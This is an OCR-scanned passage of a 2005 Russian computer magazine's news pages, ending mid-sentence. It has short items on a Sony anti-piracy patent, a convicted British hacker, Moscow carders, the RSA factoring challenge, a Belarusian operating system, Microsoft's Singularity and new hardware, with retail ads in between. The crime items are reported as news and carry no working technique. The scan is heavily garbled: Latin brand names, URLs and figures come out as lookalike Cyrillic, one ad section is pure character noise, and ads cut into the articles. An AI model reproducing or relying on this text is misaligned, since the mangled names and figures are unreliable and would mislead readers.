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*ЛІМЛ^ V* НОВЫЙ ГОД УЖЕ СОВСЕМ БЛИЗКО. ТЕБЕ ДАЕТСЯ ВОЗМОЖНОСТЬ ПРЕКРАСНО 
ПОТРАТИТЬ ВРЕМЯ В РАЗМЕРЕ 10 ДНЕЙ, ДАННОЕ ТЕБЕ СВЫШЕ. ПРОВЕСТИ ВРЕМЯ С БЛИЗКИ- 
МИ И ДРУЗЬЯМИ, ПОТОМУ ЧТО, ОПЯТЬ ЖЕ, ТАК ТЕБЕ СКАЗАЛИ СВЫШЕ :). ВЕДЬ САМОСТОЯ- 
ТЕЛЬНО ПРИДУМАТЬ ПОВОД ДЛЯ ПРАЗДНИКА НАСЕЛЕНИЕ НАШЕГО ГОСУДАРСТВА ВРЯД ЛИ 
СМОЖЕТ. ПОЭТОМУ ЭТО ПРИДУМАЛИ ЗА НАС. ЧТОБЫ НАС ВСЕХ ОБЪЕДИНИТЬ И ДАТЬ НАМ 
ВОЗМОЖНОСТЬ ПО-НАСТОЯЩЕМУ ПОВЕСЕЛИТЬСЯ ХОТЬ РАЗ В ГОДУ. 

А ТЕБЕ ВЕДЬ, В ПРИНЦИПЕ, НИчЕГО НЕ МЕШАЕТ УСТРОИТЬ СЕБЕ ПРАЗДНИКИ, ОТДЫХАТЬ 
С ПРИЯТНЫМИ ТЕБЕ ЛЮДЬМИ? МЕШАЕТ? ТОГДА СТОИТ ПРИЗАДУМАТЬСЯ. НЕ МЕШАЕТ? 

НУ ТОГДА ВСЕ ХОРОШО. 

ИТАК, НОВЫЙ ГОД. ЧТО ТЕБЕ НУЖНО СДЕЛАТЬ? ПРАВИЛЬНО, КУПИТЬ ЕЛКУ! А ЧТО ПОТОМ 
НЕОБХОДИМО С НЕЙ СДЕЛАТЬ? ПРАВИЛЬНО, НАРЯДИТЬ! А ЕЩЕ ЧТО НУЖНО СДЕЛАТЬ ПЕРЕД 
НОВЫМ ГОДОМ? ПРАВИЛЬНО, КУПИТЬ ПОДАРКИ ДРУЗЬЯМ И БЛИЗКИМ. ЧТО Ж, АЛГОРИТМ 
ПРОГРАММЫ ДАВНО ЗАПРОГРАММИРОВАН. ОСТАЛОСЬ ТОЛЬКО НАЖАТЬ КНОПОЧКУ 5ТАПТ. 
ЖМИ ЕЕ. С НАСТУПАЮЩИМ ТЕБЯ НОВЫМ ГОДОМ :). 
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ПАНАЦЕЯ ОТ ПИРАТОВ 

Есть ли панацея от пи- 
ратства? Многие счи- 
тают, что нет. Но кор- 
порация Золу другого 
мнения. В начале нояб- 
ря ІТ-гигант запатенто- 
вал новую технологию, 
которая способна от- 
пугнуть охотников за 
легкими деньгами. Но 
в то же время сделает 
невозможным простой 
обмен дисками между 
юзерами. Суть защиты 
заключается в размещении на СО специального кода, который, будучи 
однажды считан в память консоли, уничтожается, после чего на других 
проигрывателях такой диск больше не запустится. Золу планирует 
внедрить свою новую технологию с выходом приставки РІауЗіайоп 3. 
Компанию можно понять, но уже сейчас это решение вызвало бурю 
возмущения, в основном среди поклонников Р32. В самом деле, предс- 
тавь ситуацию: просишь продавца проверить игру, приходишь домой, 
а она у тебя не идет. Или приставка сгорела. Покупаешь новую, но про 
диск можешь забыть. Специалисты считают, что если Золу и дальше 
будет искать способы «усложнить жизнь геймерам», то она потеряет 
многих из них. Возможно, эту защиту также будут юзать в производ- 
стве дисков с фильмами в формате ВІи-гау. 



ДАНЯ ПРИЗНАН 
ВИНОВНЫМ 

Не пугайся, речь идет 
не о Дане Шаповало- 
ве, а о британском ха- 
кере Дэниэле Катбер- 
те, который известен 
своим взломом элект- 
ронного фонда помо- 
щи жертвам цунами. 
Парень работал в ІТ- 
компании Согзаіге, где 
занимался компьютер- 
ной безопасностью, и 
имел доступ к ценным 
информационным ре- 
сурсам. Несмотря на 
арест и обвинения, ру- 
ководство компании 
считает, что хакер заслуживал доверия, и этот инцидент — лишь недора- 
зумение. Сам Дэниэль объяснил свой поступок так: он в начале решил 
сам помочь фонду и перевел на его счет деньги, но затем заподозрил, что 
стал жертвой мошенников. Лучший способ проверить подлинность сайта 
— порыться в корневом каталоге, что он, собственно, и сделал. Но адми- 
ны его просекли и передали властям. Хакера судили по закону СМА и 
признали виновным. Пока неизвестно, какой Даня получил приговор, но, 
учитывая его первый арест и хорошие рекомендации, можно предполо- 
жить, что он получит штраф и условный срок. 





СУДНЫЙ ДЕНЬ 
ДЛЯ ТРЕХ КАРДЕРОВ 

В Москве состоялся суд над тремя карде- 
рами: Позднеевым, Рыжиковым и Дмит- 
риевым, которые с февраля по апрель 
2005 года затаривались компьютерным 
добром в е-шопе ЗоКкеу по чужим кре- 
дитным кардам. Номера кредиток и инфу 
о владельцах парни скупали по дешевке 
у более продвинутых «коллег», а затем 
просто использовали для оплаты покупок. Всего за пару месяцев им 
удалось приобрести оборудования на 80 тысяч рублей. К апрелю отдел 
мониторинга платежных операций выявил мошенников и заявил о них в 
милицию. Некоторое время органы следили за совершением операций, 
пытаясь выйти на продавцов номеров кредиток, а когда кардеры зака- 
зали новую партию товаров на 60 тысяч, взяли их «на горячем». Так как 
они согласились компенсировать ущерб, а также помочь следствию, все 
трое получили по 5 лет условно. 




НАГРАДЫ 

ЗА ВЗЛОМ КЛЮЧЕЙ 

ВЗА Зесигііу — компания, которая не только не преследует хакеров, 
пытающихся ее взломать, но даже платит им за взлом. Некоторое вре- 
мя назад она опубликовала цепочку ключей возрастающей длины и 
предложила награду тем, кто сможет их хакнуть. Чем дальше ключ в це- 
почке, тем дороже он стоит. Последнее число имеет 2048-битную длину 
и оценено в 200 тысяч долларов. Самыми активными участниками эста- 
феты стала группа криптоаналитиков из Бонна, они в мае этого года де- 
кодировали 200-значное число, а в ноябре — 193-значное. Для этого бы- 
ли задействованы 80 процессоров Орігоп по 2,2 Гц каждый. К победам 
компьютерщиков из Бонна ВЗА отнеслась со скепсисом. Парням потре- 
бовалось несколько месяцев для того, чтобы одолеть далеко не самые 
сложные ключи. При таких темпах декодировать главный ключ займет 
десятки лет. Впрочем, компьютерную мощь, привлеченную к работе, 
вряд ли можно назвать гигантской. Имеющиеся суперкомпьютеры нам- 
ного быстрее такого кластера, но работают они над другими задачами. 
Если бы можно было привлечь их или бы заюзать приличную сеть поль- 
зовательских машин, то дело бы пошло намного быстрее. 







ново* 

ІЕХНОЛОГ /1 *,й 

которое врЕМЯ 
ОТКЛИКА^ 

\Йе^т$ 







ф 




Во*мл ргтк/ім^; ЭчС 
Контв*вг 700:1 



(иГ/ИЛ > -1>-8і 

и- и и . і р с Іічоік кі* к( 



Экрін: технология ^-Е^д>пе 

КйЛи^вСТяа гдшеіос ІЙДчлр 

ш і№.«04І-и. 4 ш іі#!чі іті.-де-ійкяі 4"-») №• в*н г,< 
нмДО'ѴыЦДО Ы№ #Й§1 ГТіГ.тч НѵгіЬ* і»#)»; 1 
Щйііі 1| П і ир і м ■ I I II ІПГ" "М ПЩГ Гц II ,М№ «Г-М-Г* 

&ѴМГЫШЩ • '&|іііА»'4| НК"***- Г- и * 1}я«ч »№ 4?.ЧНИі 

і . ,№|ыріі Ш 1№ШПГ НГМ^т**»* йЖШЫ I* К І^ъ» ГѴ, V *? 

■ ‘ ЬАРНАѴ^ МНИнИІ ІІНгк -Киііиы ■■ 

■РВДНОСПР РМ ілтиьыч* ВОЛГОГРАД «цм^і^іічі :і 

№ Н-.ІИ и|,Гі-‘ 'ИШМ іЭіК* -а % ИР'ІСУТ'ИС 

Й-Ы* 4= КАЗАН*: Ч*і4«ѵ** РЧЙНь^П 1. КИРОВ І^Ѵ» ^*.ѴК-Ч.1- 
ИЧСІИіГМУиР’ . !■ Ы1< «іьшгшп РПГ.КММІ ІИ^Н^ЯРСК Счіцжші ЙЙО 

»і.-«у . »4Ит* ШМ^ОІС» "фтт 1- "і ІТП Ті ІШЖЧИИ нангоисщ Дд ційц ьм ■ .-ЧР---Е 

П9і,-Г|іл и.- «а г -І. І -ФІ -* НШОКМЬНа'СК |цн ІЙШЬІ' РЗ № нС* 11кХГ11М1-4г 

к МЪЗ'іІ 1 ' №1 I- !)грі ШЭЯ ЬСА ОЫрГ:К Глнж мі««і I ЙРІШ -и ?? 

ДПЦЙНМ^ даі'ИЬИч нМде ММаТИМИ ПЕРМЬ. -.ЛЕ^ЭХ Ні ІК.НІІА <Ир ■■ 

ІМПННі ИК1М.ВД.ЙСМ — . кил#» ТК і ИШИ ЦМ13№ЗІ 11 №144* іИХПѴГ»** 
ОиЯАХОИ а ” *| ЙН I " I' :киы-*яМяршиг. іМЛ_".Д1-1 3- -4 САМАРА Аср (МЫМС-И-П 

ГЕК гМТПЙІВ ■ Лп шштлтщ ГЙЛЬЙНЙ '..м ІШЛФІН Гкрні» іНІЛРВ-ІГ П1 

ШШ лги- ■„ ■ ^гіШІ-НЬ іцкйч«- чъ/гм-чТ-І-і ►■■«■ сытгетглг* 

ЧР ЛЯчЬЙИ* Ч Литр 1ПЧУ 4 -+*■ ■ ИвЬфг іѵ*» ѴІІІ 7? 'Л Нм-ЭІй' І ійіННнЬМй 



ХАКЕР 12 [84] 05 > НЬЮСЫ 006 ] 



][МЕѴѴ8 ▼ 



НІТЕСНЫЕѴѴ5 ▼ 



В БЕЛАРУСИ 
РАЗРАБАТЫВАЮТ 
АЛЬТЕРНАТИВУ 
ВИНДЫ 

Республика Беларусь бросила вызов 
могущественной МісгозоК. Причем в 
той области, где софтверный монстр 
особенно силен. Сенсационная новость 
о том, что белорусские программеры 
приступили к разработке собственной 
операционной системе на открытых ко- 
дах, была объявлена президентом стра- 
ны Александром Лукашенко еще два 
года назад, на ІТ-саммите в Женеве. Но тогда это было больше похоже на 
рассуждения. Александр объяснял, почему их жителям приходится нару- 
шать интеллектуальные права и покупать пиратский софт, насколько их 
зарплаты не соответствуют ценам на софт. Разработка своими силами 
альтернативы винды стала бы решением проблемы. Европейский союз 
поддержал Лукашенко, но только теперь разработчики приступили к ак- 
тивной работе. Сейчас они подготавливают заявку на финансирование 
проекта, и к моменту выхода журнала депеша будет уже отправлена в Ев- 
росоюз. Ожидается, что белорусская система будет совместима с 
ѴѴіпбоѵѵз-приложениями и появится (если появится) в продаже по цене 
$1 5. О достоинствах ее пока говорить рано, как и о времени выхода, — 
система находится в ранней стадии разработки. Но похвально, что люди 
своими силами стараются бороться с монополией МісгозоТС. Что из этого 
выйдет, мы узнаем через несколько лет. Или несколько десятков лет. 




Веіагив 

Ноте ЕШіол 



СООСІ.Е 

ВНЕДРЯЕТ НОВЫЙ 
ХОСТИНГ-СЕРВИС 




1 5 ноября Ооодіе запустила новую службу Ооодіе Вазе. Это бесплатный хос- 
тинг файлов с практически неограниченным объемом и удобными инстру- 
ментами сортировки и поиска. Второй вариант использования — хороший ис- 
точник, чтобы поделиться своей информацией и файлами с другими юзера- 
ми. Можно даже вести блог или размещать рекламные объявления. Уже сей- 
час специалисты предрекают соперничество с такими порталами, как еВау, 
которые специализируются на размещении коммерческих объявлений. Но 
директор Ооодіе, Марк Лейбовиц, заверил, что целей конкурировать с таки- 
ми сайтами у них нет, вместо этого они просто помогают людям донести до 
своих друзей, знакомых или просто других юзеров определенную информа- 
цию, чаще всего некоммерческого содержания. Пока Ооодіе Вазе находится 
в стадии Веіа-тестирования, ты имеешь шанс стать ранним пользователем 
службы, зарегистрировавшись по адресу ШрУ/Ьазе.доодІе.сот. 



СЕКОНД ХЭНД 
ОТ МІСКОЗОРТ 

Очень многих удивило недавнее решение МісгозоК. Билли, который 
всегда был сторонником лицензий и качественного техсуппорта, благос- 
ловил британских реселлеров приторговывать б/у'шными коробками с 
виндой. Поступают такие партии в основном от обанкротившихся фирм 
и продаются со скидкой в 20 — 50%. Раньше это считалось незаконным 
и приравнивалось к пиратству. Теперь во всех ларьках с секонд хэндом 
от МісгозоК висит табличка: «одобрено Гейтсом». Ну или что-то в этом 
роде. Подобный ход в софтварной компании, оказывается, планировал- 
ся еще полтора года назад. Теперь б/у лицензии считаются активами и, 
по словам представителя МісгозоК, могут изменить отношение к потре- 
панным коробкам. Менеджер по лицензированию ПО фирмы Вазіііса 
Крис Лам прокомментировал такую ситуацию так: «Это определенно уг- 
роза для нас, так как мы ориентируемся на предоставление своим за- 
казчикам полного спектра услуг. Я не знаю, какие цены предлагают эти 
парни, но если можно будет приобрести точно такие же лицензии за 
треть цены, то последствия будут катастрофическими». 




МІСЯ080ГТ 

РАЗРАБАТЫВАЕТ 

НОВУЮ 

ЗАЩИЩЕННУЮ ОС 




Кодовое название проекта — Зіпдиіагііу. Никакого отношения к винде 
новая система не имеет и будет основана на совершенно новых техноло- 
гиях. Разрабатывается она отдельным штатом из 35 программистов, а ос- 
новным критерием является надежность. Сейчас разработчики дорабаты- 
вают ядро системы, состоящее из 300 тысяч строк кода на языке С#, 
а также шлифуют новую технологию ЗоКѵѵаге Ізоіаіесі Ргосеззез (ЗІР), при 
которой процессы выполняются в изолированных «контейнерах». 

Такой подход позволяет лучше и быстрее проверять работу всех компонен- 
тов — достаточно обратиться к ЗІР, на котором он запущен. Пока неизвест- 
но, как будет позиционироваться новая ОС МісгозоЙ. Скорее всего, Зіпдиіагііу 
станет альтернативным решением для серьезных фирм, которые заботятся о 
своей безопасности, и будет применяться в финансовых сферах или там, где 
находится информация из разряда «совершенно секретно». 





РШ. ПІ5 

ФЕДЕРАЛЬНАЯ СЕТЬ КОМПЬЮТЕРНЫХ ЦЕНТРОВ 



17555557 

мллллі.роІагІБ.ги 



Дарите подарки, 

которых ждут! 




Выбирая компьютер Адеш на базе процессора Іпіеі Репііит 4 



Только с 15 по 26 декабря при покупке любого 
компьютера ІЧТ 600 серии на базе процессора 
ІпІеІ®РепІіит®4 с технологией НТ в магазинах 
РОІ.АРІЗ в г. Москва Вы получаете в подарок 
сетевой фильтр АРС. 



с технологией НТ, Вы оправдаете все ваши ожидания! 



Улучшенная производительность в мультимедийных приложениях. Расширенные возможности 
редактирования цифрового фото и видео. Непревзойденная скорость обработки музыки. И самое удивительное - 
возможность делать всё это одновременно благодаря процессору НеР Репііит® 4 с технологией НТ! 



• З-х летнее бесплатное обслуживание, включая год полной гарантии 

• бесплатное обслуживание на рабочем месте в Москве (в пределах МКАД) 



* 100% предпродажное тестирование 
» отличные характеристики для работы дома и в офисе 



ФЕДЕРАЛЬНАЯ СЕТЬ КОМПЬЮТЕРНЫХ ЦЕНТРОВ 



Москва, м. Багратионовская, ТВК ..Горбушкин Двор.* пав.: Е2 - 14/15, Е2 - 1 1 (095)755-5513 

Москва, м. Братиславская, ул. Братиславская, д.1 6, стр.1 (095)237-8240 

Москва, м. Домодедовская, Ореховый бульвар, 1 5, ТЦ "Галерея Водолей, 3 эт. (095)390-8834 
Москва, м. Динамо, ул. 8 Марта, д.1 0, стр.1 (095)262-8039 

Москва, м. Дмитровская, ул. Башиловская, д.29/27 (095)678-5470 

Москва, м. Комсомольская, ун-г «Московский», 4 этаж, пав.: 27 (095)359-891 5 

Москва, м. Красносельская, ул. Краснопрудная, 22/24 (095)389-4622 

Москва, м. Красносельская, ул. Русаковская, д.2/1 (095)784-6385 

Москва, м. Люблино, ТК "Москва", 2 этаж, 1 линия (095)784-661 5 

Москва, м. Петровско-Разумовская, Локомотивный пр-д, ТК'Электромаркет (095)977-0815 
Москва, м. Пл. Ильича, ул. Сергия Радонежского, 31 (095)935-8727 

Москва, м. Пражская, ТЦ "Электронный рай", пав.: 1Б-47, 2В-1 4,1 В-18, ЗП-9к (095)129-1119 

Москва, м. Профсоюзная, Нахимовский пр-т, 40 (095)91 6-5627 

Москва, м. Пушкинская, ул. Малая Дмитровка, 1/7 (095)973-1 133 

Москва, м. Савеловская, ВКЦ "Савеловский", ул. Сущевский Вал, д.5, пав.: 20-5,024 (095)730-1 549 

Москва, м. Савеловская, Сущевский вал, 5, стр. 20, ТК "Салют 5", пав.: К-5 (095)200-3060 

Москва, м. Савеловская, Сущевский Вал, 3/5 (095)264-1 333 

Москва, м. Сокол, Волоколамское ш., 2, в здании «ГИДРОПРОЕКТ» (095)797-8986 

Москва, м. Шаболовская, ул. Шаболовка, 20 (095)347-9638 

Москва, м. Шоссе Энтузиастов, пр. Буденного, 53, КЦ"Буденовский", пав.: К5 (095)785-8658 
Москва, м. Щукинская, ул. Новощукинская д.7 (095)797-8064 

Интернет-магазин: ІтПр://5Ітор.п1:.ги (095)970-1939 

Интернет-магазин: НПр://5000.ги (095)363-9363 



Санкт-Петербург, м. Новочеркасская, Новочеркасский пр-т, 51 

Санкт-Петербург, м. Пр.Просвещения, ТК "НОРД", 2-й этаж, пав.: 204 

Санкт-Петербург, м. Сенная, ТЦ "ПИК", 3 этаж, пав.:304 

Санкт-Петербург, м. Петроградская, Каменноостровский пр., д.45 

Санкт-Петербург, м. Ладожская, ТК "НЕО", 3 этаж, пав.:52 

Санкт-Петербург, м. Ленинский пр-т, Ленинский пр-т, 1 1 9 

Белгород, ул. Николая Чумичева, 64, А 

Воронеж, ул.Кольцовская, 82 

Воронеж, ул.Кольцовская, 29 

Екатеринбург, пр-т Ленина, 99 

Екатеринбург, ул. Челюскинцев, 21 

Казань, ул. Вишневского, 1 2 

Казань, пр. Ямашева, 82 

Краснодар, ул. Красноармейская, 57 

Липецк, ул. Водопьянова, 1 5 

Нижний Новгород, Пл. М. Горького, ул.Звездинка, 3 

Нижний Новгород, м. Канавинская, ТЦ "Новая Эра", 1 этаж 

Ростов-на-Дону, пр-т Буденновский, 80 

Ростов-на-Дону, пр-т Буденновский, 9/46 

Ростов-на-Дону, Ворошиловский пр-т, д.1 2 

Самара, Московское ш., ТК "Московский" 

Самара, Ново-Садовая, 21 
Самарар, Стара-Загора, 1 24 
Смоленск, ул. Кирова, 49 
Тольятти, ул. Мира, 94А 



Л/Г 



сотриіег 

Оптовые продажи: 
(095)970-1930, ѵѵѵѵѵѵ.пі.ги 




Логотипы N1 Сотриіег и РОБАРІЗ являются зарегистрированными знаками их владельцев. Іпіеі, Іпіеі І_о|о, Іпіеі Іпзісіе, Іпіеі Іпзісіе І_о§о, Репііит являются зарегистрированными торговыми знаками корпорации ІпіеІ и еі 
При покупке компьютера обратите внимание установлена ли лицензионная операционная система Місго5оП®ѴѴІпсіоѵѵз®ХР. Только в этом случае Р0БАНІ5 может гарантировать надежность 



репііит 4 



э дочерних компаний в США и других странах 
работы компьютеров. 




НАВ0ЫЕѴѴ5 ▼ 



НАВРЫЕМЗ ▼ 




ГОРДОЕ СЛОВО МОДЕМ 




Как всем известно, чем больше диагональ у монитора, тем больше полез- 
ной информации на нем помещается. Но человеку всегда мало. Сначала 
его устраивали 14 и 15-дюймовые экраны, потом пределом мечтаний стали 
«семнашки», а теперь и размер в 19 дюймов многих не особо устраивает. 
Специально для них компания Затзипд представляет 20,1 -дюймовый мо- 
нитор ЗупсМазІег 204Тз с фирменной РѴА-матрицей. Он имеет разреше- 
ние 1600x1200 точек, широкие углы обзора (170 градусов по вертикали и 
горизонтали), яркость 250 кд/м2 и контрастность 700:1 при времени откли- 
ка 16 мс. Имеются преднастроенные режимы, которые, как и все прочие па- 
раметры, можно изменять без помощи кнопок монитора — с помощью ути- 
литы МадісТипе. Но магия на этом не заканчивается, есть еще функция 
МадісВоІайоп, которая автоматически подстроит изображение при перево- 
де монитора в портретный режим. К этой панели можно напрямую подклю- 
чать различные устройства вроде ЭѴЭ-плеера. При этом поддерживаются 
такие режимы, как РІР (РісШге Іп РісШге) и РВР (Рісіиге Ву Рісіиге), что поз- 
воляет одновременно видеть на экране картинки из различных источников. 



Локальные сети и прочие коммуникационные новшества — это, конечно, 
очень хорошо, но не стоит делать презрительную мину и при слове «мо- 
дем». Особенно если это не простой, а АЭЗЬмодем от компании Асогр. 
Сегодня она представляет нам две своих новинки: модемы Зрпп1ег@АЭ31_ 
І_АЫ120 и Зргіпіег@АОЗІ_ І_АЫ420 второго поколения. Приписочка про по- 
коление означает очень приятную вещь: эти модемы поддерживают 
связь по технологиям АЭЗІ_2 и АЭЗІ_2+, на которые уже давно начинают 
переходить соответствующие провайдеры. Это означает, что они могут 
принимать данные со скоростью до 24 Мбит/с. Модель ЗргіпІег@АЭЗІ_ 
І_АЫ120 предназначена для использования на дому или в небольшом 
офисе. Благодаря наличию интерфейсу Разі ЕШегпеІ и функциям марш- 
рутизатора его можно подключить к локальной сети и обеспечить ис- 
пользование канала АЭЗІ_ нескольким пользователям одновременно. 
Модем Зрпп1ег@АЭ31_ І_АЫ420 имеет четырехпортовый коммутатор Разі 
ЕІИегпеІ и функции маршрутизатора, что избавляет пользователя от не- 
обходимости приобретения отдельного коммутатора ЕІПегпеІ. 



С-200 

ЭТО НЕ ТОЛЬКО ЗРК 

Ты наверняка слышал в выпусках теленовостей такие названия, как С-200, 
С-300 и С-400. Да, правильно, это отечественные зенитно-ракетные комп- 
лексы, самые лучшие в мире. Но сейчас мирное время, поэтому такими 
названиями обладают не только военные машины, но и комплекты акусти- 
ческих систем для домашних кинотеатров. Знакомься — С 200 от компа- 
нии АѴЕ. Это шестиканальные системы, отличающиеся стильным дизай- 
ном, метровыми фронтальными колонками, системой объемного звучания 
и полноценной двухполосной конструкцией излучателей. Компактный 
сафвуфер содержит блок цифровой регулировки высоких, низких частот и 
баланса, многоканальный усилитель для громкоговорителей основных ка- 
налов (30 Вт х5) и, разумеется, самого сабвуфера, номинальная выходная 
мощность которого составляет 80 Вт. У системы имеется пульт дистанци- 
онного управления и широкие коммуникационные возможности — анало- 
говые порты и два микрофонных входа для караоке. Предлагается два вы- 
бора расцветки — се 
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НЕ ВСТАЕМ 
С ДИВАНА 

Наверное, все в детстве слышали о вол- 
шебной палочке, которая дает своему об- 
ладателю очень много плюсов. А потом 
мы вырастали и понимали, что никакой 
такой палочки вовсе нет. Разочарование 
было жутким. Компания І_одіІесІі захотела 
подсластить пилюлю, выпустив пульт 
Нагтопу АбѵапсесІ ІІпіѵегзаІ Ветоіе 
Сопігоі. Теперь можно забыть кучу уст- 
ройств ДУ, каждое из которых может уп- 
равлять только одним бытовым прибором. 
Это Пульт от І_одіІесІі является универ- 
сальным — с его помощью можно управ- 
лять практически любым домашним 
электронным устройством: компьютером, 
телевизором, домашним кинотеатром, 
приставкой Х-Вох... Причем не поочеред- 
но, а одновременно, так как на неболь- 
шом ЖК-экране происходит выбор необ- 
ходимого прибора. Онлайновая база ком- 
пании содержит в себе информацию об 
огромном количестве устройств и наст- 
ройке для управления ими. Скачиваем их, 
через разъем ІІЗВ передаем в пульт — 
и вуаля! Так как телевизором может уп- 
равлять любой человек, а компьютером 

— нет, то компания І_одіІесИ предусмотре- 
ла удобство и легкость работы с пультом 

— специальный мастер поможет во всем 
разобраться даже неопытному пользова- 
телю. 





АЗІІЗ рекомендует ѴѴіпбоѵѵз® ХР РгоТеззіопаІ 




Насладись жизнью в современном цифровом мире 

Ноутбуки АЗІІЗ МбѴа с новейшим чипсетом Іпіеі® 915РМ (поддерживает 
00Р2 400/533 МГц и РСІ Ехргезз) и беспроводной связью Іпіеі® Рго/ѴѴігеІезз 
2915АВО, - это быстрые и точные машины высокого класса. Великолепное 
изображение реализуется благодаря широкоформатной 15.4" ТРТ- матрице 
СгузіаІ ЗГііпе и производительному графическому адаптеру с развитой 
системой обработки ЗО-графики. Подключайтесь к миру цифровых 
развлечений и мощных вычислений. 

Іпіеі® Сепігіпо® МоЬПе ТесЬпоІоду 



ІИ Аисііо Об: прослушивание музыки без загрузки системы 
*= Удобный дизайн широкого экрана и тачпада 



^ МОВИЕ 
ТЕСНІ\ІОІ_ОеѴ 



- Процессор Іпіеі® Репііит® М 700 серии 

- Іпіеі® 915РМ сЫрзеІ 

- Іпіеі® Рго/ѴѴігеІезз 2915 а/Ь/д или 2200 Ь/д 
МісгозоИ® ѴѴіпсІоѵѵз® ХР: 

- Ноте Есііііоп 

- Ргоіеззіопаі ЕсІШоп 

Широкоформатная ТРТ- матрица СгузіаІ 5Ыпе с диагональю 15.4" ѴѴЗХОА+ (1680x1050) 
Видеоподсистема РСІ-Е АТІ МоЬіІіІу™ Расіеоп® Х700 с 128Мб 
Память до 2 Гб ООР2 400/533 МГ ц 
ВІиеІооІЬ 







Всемирная гарантия 2 года 
Горячая Линия АЗІІЗ: (095) 23-11-999 




Москва: Армада РС (095) 641-04-24 многоканальный, Артрон (095) 789-85-80, Аѵакот М (095) 784-67-36, Аѵапіа РС (095) 954-54-22, Белый Ветер (095) 730-30-30, РогсеСотр (095) 775-66-55, ЮМ (095) 729-57-10, 
ИЕХІІЗ (095) 928-23-67, Тенфолд (095) 545-32-71, ОІ.ОІ (095) 105-07-00, ПИРИТ (095) 974-32-10, Роіагіз (095) 755-55-57, Портком (095) 101-33-64, Респект (095) 177-40-77, Сетевая Лаборатория (095) 500-03-05, 
ЗМЗ (095) 956-12-25; СтартМастер (095) 967-15-15, ТФК (095) 749-96-32; Умные машины (095) 780-00-41, Ф-Центр (095) 105-64-47, ІІЗІЧ (095) 775-82-02; Санкт-Петербург: Оізріау (812) 103-00-18, КЕЙ (812) 331-24- 
77, Микробит (812) 333^4-44, Компьютерный мир (812) 333-00-33; СТР Компьютере (812) 542-4551; Барнаул: С-Тгабе (3852) 38-10-00; Воронеж: РЕТ (0732) 77-93-39; Екатеринбург: Парад (3432) 51-48-22, 
Старттехно+ (3432) 56-85-01; Краснодар: Владос (8612) 62-33-73, Санрайз (8612) 640-066; Новосибирск: НЭТА (3832)16-33-11, Техносити (3832) 125-333; Ростов на Дону: Центр-Дон (8632) 698-668; Самара: 
Прагма (8462) 701-701 ; Томск: Интант (3822) 41-55-32; Тюмень: АР Зузіетз (3452) 22-35-33; Челябинск: Японская электроника (3512) 63-74-34; Хабаровск: Апукеу (4212) 328-155 



Іпіеі, Іпіеі Іодо, Іпіеі Іпзісіе, Іпіеі Іпзісіе Іодо, Іпіеі Сепігіпо, ІпіеІ Сепігіпо Іодо, Сеіегоп, Іпіеі Хеоп, Іпіеі ЗреесІЗІер, Ііапіит, апсі Репііит аге (гасіетагкз ог гедізіегесі (гасіетагкз о( ІпіеІ Согрогаііоп ог Из зиЬзісііагіез іп Ше Упііесі Зіаіез апсі оФег соипігіез 








Если есть такие ненавистники, то, 
видимо, есть и фанаты. В Америке 
чрезвычайно много шизанутых фа- 
натов белого дизайна. Наш добрый 
начальник экс-главред журнала Ха- 
кер, товарищ ЗІІМІег, сравнительно 
недавно был у западных братьев в 
гостях. Сидя в кафе, он увидел, как 
один негр нервно ковыряется свои- 
ми руками в куртке. Оказалось, что 
этот негр незаметно достал старый 
кассетный плеер, поменял сторону 
кассеты и включил музыку обратно. 
Причем темнокожий товарищ был с 
наушниками от іРо<± В общем, негр 
банально боялся запалиться со сво- 
им древним плеером. 

Одним словом, уровень фанатизма 
в Америке к продукции Арріе достиг 
критической точки. На тебя будут 
косо смотреть, если ты будешь идти 
с плеером от другого бренда или, 
наоборот, улыбнутся, если увидят в 
руке белый іРоб. У нас в России та- 
кого бешенного фанатизма нет, но 
некоторые уже начали сходить с 
ума. Например, наш горячо люби- 
мый зуплЬіозіз уже купил себе пос- 
ледний іРоб и ноутбук РоѵѵегВоок 
04. Естественно, у него установлен 
іТипез последней версии. 



У любой популярной вещи, помимо 
миллионов фанатов, обязательно 
находятся и ярые противники. При- 
чем количество недоброжелателей 
и эксцентричность их выходок пря- 
мо пропорциональны распростра- 
ненности устройства. Ненавистники 
плеера іРоб недавно создали сайт 
зтазіітуіросі.сот, целью которого 
было собрать $400 на приобретение 
нового іРоб, после чего отправиться 
в фирменный магазин Арріе и, не 
отходя от кассы, вдребезги разбить 
покупку прямо на глазах у удивлен- 
ных продавцов и покупателей. Сра- 
зу после запуска сайта в адрес ав- 
торов посыпались тысячи гневных 
писем и угроз от яблочников, одна- 
ко людей, желающих проанонсиро- 
вать данное мероприятие, тоже бы- 
ло предостаточно, и в результате 
требуемая сумма была внесена 
в довольно оперативные сроки. Как 
ни странно, авторы не прикармани- 
ли собранные деньги, а через нес- 
колько дней, как и обещали, с осо- 
бым цинизмом честно исполнили 
задуманное. При этом весь процесс 
экзекуции засняли на видеокамеру 
и выложили для свободного скачи- 
вания на собственном сайте. На 
данный момент эту запись скачали 
более 250000 раз. Конечно, созда- 
тели сайта не собираются останав- 
ливаться на достигнутом, уже запу- 
щены три аналогичных проекта, 
направленных на разрушение игро- 
вых приставок нового поколения. 
ХЬох 360, РІауЗІайоп 3 и ІМіпІепбо 
Веѵоіийоп. Кстати, к моменту выхо- 
да этого номера смертный приговор 
уже должен быть исполнен и для 
приставки от МісгозоТС (необходи- 
мые $430 уже внесены). 



іРоЛ 
СОСЮ Виу! 







Твой мир всегда с тобой. 

ТТюплзоп І_уга - новая линия трЗ плейеров/записывающих устройств - вне моды и стиля. Просто выбери то, что подходит 
именно тебе. Будет ли это ГМ радио, плейер и записывающее устройство «всё-в-одном» или 115В ключ для 

прямой передачи данных, а может быть, 5-гигабайтный аудио «іикеЬох» для просмотра фотографий или 
мультимедиа «іикеЬох» для записи и просмотра видео со звуком, музыки и фотографий - решать только тебе. 
ТІіотзоп І_уга. Куда бы ты ни собрался, возьми свой мир с собой... 



Товар сертифицирован. 



ТН0М8СМ І_УРсК 
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* ХАКЕРЫ 
о НА ФИНАНСОВОЙ 
§ БИРЖЕ 
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Как можно разбогатеть, ес- 
ли ты банкир и неплохо со- 
ображаешь в компьютер- 
ной безопасности? Можно 
украсть у своего же банка 
миллион баксов, но тебя 
поймают и посадят на сле- 
дующий день. Можно при- 
торговывать инфой, но то- 
же небезопасно. Кто знает, 
в какие руки эта инфа попа- 
дет, и не сдаст ли тебя поку- 
патель. Эстонские банкиры Оливер Пеек и Кристиан Лепик придумали 
свой способ. Воспользовавшись банковским компьютером І_НѴ, они ус- 
